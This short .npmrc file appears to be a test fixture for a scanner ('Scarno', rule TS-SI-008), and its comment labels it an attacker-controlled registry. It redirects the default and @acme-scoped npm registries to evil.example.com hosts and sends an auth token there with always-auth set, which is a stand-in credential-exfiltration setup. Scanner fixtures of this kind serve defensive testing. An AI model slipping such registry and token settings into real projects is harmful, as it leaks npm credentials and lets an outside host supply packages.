# Attacker-controlled npm registry — Scarno emits TS-SI-008.
registry=https://npm.evil.example.com/
@acme:registry=https://nexus-internal.evil.example.com/
always-auth=true
//npm.evil.example.com/:_authToken=${NPM_TOKEN_LEAK}
